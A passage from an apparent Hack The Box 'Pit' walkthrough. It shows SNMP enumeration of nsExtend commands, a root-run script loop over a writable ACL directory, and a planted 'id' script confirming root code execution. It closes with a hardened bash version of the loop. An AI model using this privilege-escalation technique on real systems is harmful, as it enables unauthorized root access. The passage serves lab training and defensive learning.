nsExtendCommand
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ snmpwalk -v 1 -c public $IP net-snmp-extend-mib::nsExtendCommand
net-snmp-extend-mib::nsExtendCommand."memory" = STRING: /usr/bin/free
net-snmp-extend-mib::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
Earlier, I found out that the net-snmp-extend-mib::nsExtendCommand OID, "monitoring", is executing a binary at /usr/bin/monitor
According to the documentation found on the official RHEL website, the NET-SNMP-EXTEND-MIB MIB is an extension to the Net-SNMP Agent that can be used to query arbitrary shell scripts.
It is specified in the /etc/snmp/snmpd.conf file. Once specified there, those become individual net-snmp-extend-mib::nsExtendObjects OIDs that get executed every time SNMP gets called
In the current assessment, an unknown binary is being called from the net-snmp-extend-mib::nsExtendCommand."monitoring" OID, pointing to /usr/bin/monitor
/usr/bin/monitor
[michelle@pit local]$ ll /usr/bin/monitor
-rwxr--r--. 1 root root 88 Apr 18 2020 /usr/bin/monitor
[michelle@pit local]$ cat /usr/bin/monitor
#!/bin/bash
for script in /usr/local/monitoring/check*sh
do
/bin/bash $script
done
The /usr/bin/monitor file is a Bash script that does the following:
- checks for check*sh files under the /usr/local/monitoring/ directory
- executes them
/usr/local/monitoring with ACL
[michelle@pit local]$ ll /usr/local/monitoring
ls: cannot open directory '/usr/local/monitoring': Permission denied
I am unable to view the /usr/local/monitoring directory
[michelle@pit local]$ ll /usr/local/
total 0
[...REDACTED...]
drwxrwx---+ 2 root root 101 apr 7 13:45 monitoring
[...REDACTED...]
Checking the parent directory reveals that the directory has access control entries (ACEs) set (the + sign in the permission bits area)
This must be what PEAS picked up earlier
It showed that the michelle user has write and execute permissions to the directory, but is unable to read it
Let’s test the write permission
Code Execution
[michelle@pit monitoring]$ echo 'id' > /usr/local/monitoring/check_test.sh
I put a command, id, to test the code execution
┌──(kali㉿kali)-[~/archive/htb/labs/pit]
└─$ snmpwalk -v 1 -c public $IP NET-SNMP-EXTEND-MIB::nsExtendOutLine
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".1 = STRING: total used free shared buff/cache available
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".2 = STRING: Mem: 4023492 537080 2540292 46640 946120 3150152
NET-SNMP-EXTEND-MIB::nsExtendOutLine."memory".3 = STRING: Swap: 1961980 0 1961980
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".1 = STRING: Database status
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".2 = STRING: OK - Connection to database successful.
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".3 = STRING: System release info
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".4 = STRING: CentOS Linux release 8.3.2011
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".5 = STRING: SELinux Settings
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".6 = STRING: user
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".7 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".8 = STRING: Labeling MLS/ MLS/
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".9 = STRING: SELinux User Prefix MCS Level MCS Range SELinux Roles
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".10 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".11 = STRING: guest_u user s0 s0 guest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".12 = STRING: root user s0 s0-s0:c0.c1023 staff_r sysadm_r system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".13 = STRING: staff_u user s0 s0-s0:c0.c1023 staff_r sysadm_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".14 = STRING: sysadm_u user s0 s0-s0:c0.c1023 sysadm_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".15 = STRING: system_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".16 = STRING: unconfined_u user s0 s0-s0:c0.c1023 system_r unconfined_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".17 = STRING: user_u user s0 s0 user_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".18 = STRING: xguest_u user s0 s0 xguest_r
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".19 = STRING: login
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".20 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".21 = STRING: Login Name SELinux User MLS/MCS Range Service
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".22 = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".23 = STRING: __default__ unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".24 = STRING: michelle user_u s0 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: root unconfined_u s0-s0:c0.c1023 *
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:snmpd_t:s0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: System uptime
NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: 15:11:19 up 12:10, 4 users, load average: 0.04, 0.06, 0.07
End of MIB
I specified the NET-SNMP-EXTEND-MIB::nsExtendOutLine OID in this case
The code execution is confirmed as uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:snmpd_t:s0 is printed out in the output
Although the execution was made with privileges of the root user, it seems that it is still under the influence of the security policy set by SELinux; context=system_u:system_r:snmpd_t:s0
Nevertheless, I should be able to escalate privileges this way
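A defensive counterpart to the /usr/bin/monitor loop shown above, as an added example that is not part of the original notes or the target's own code: the same loop, but it refuses to run anything from a directory or script that a non-root account could modify. The function names and the TRUSTED_UID variable are hypothetical, and GNU stat (as on the CentOS host) is assumed.

```bash
#!/bin/bash
# Added example: hardened variant of the page's /usr/bin/monitor loop.
# TRUSTED_UID is an assumption: 0 (root) on a real host, overridable for testing.
TRUSTED_UID="${TRUSTED_UID:-0}"

# Succeed only if $1 is owned by the trusted uid and is not group/other-writable.
# On a path carrying POSIX ACLs (the "+" in ls output) the group bits hold the
# ACL mask, so a named-user write entry can only be effective if group-write
# is visible here. Symlinks report mode 777 and are therefore rejected too.
is_trusted_path() {
    local owner mode
    owner=$(stat -c '%u' -- "$1") || return 1
    mode=$(stat -c '%a' -- "$1") || return 1
    [ "$owner" = "$TRUSTED_UID" ] || return 1
    # 022 (octal) = group-write | other-write
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# Run check*sh scripts from directory $1, but only from a trusted directory
# and only scripts that are themselves trusted.
run_checks() {
    local dir="$1" script
    if ! is_trusted_path "$dir"; then
        echo "refusing: $dir is not owned by uid $TRUSTED_UID or is group/other-writable" >&2
        return 2
    fi
    for script in "$dir"/check*sh; do
        [ -f "$script" ] || continue
        if is_trusted_path "$script"; then
            /bin/bash "$script"
        else
            echo "skipping untrusted script: $script" >&2
        fi
    done
    return 0
}

# Stand-alone use: pass the script directory as the first argument.
if [ "$#" -gt 0 ]; then
    run_checks "$1"
fi
```

Against the directory listed above (drwxrwx---+), this wrapper would refuse to run at all; the underlying fix is still to remove the write ACE from /usr/local/monitoring.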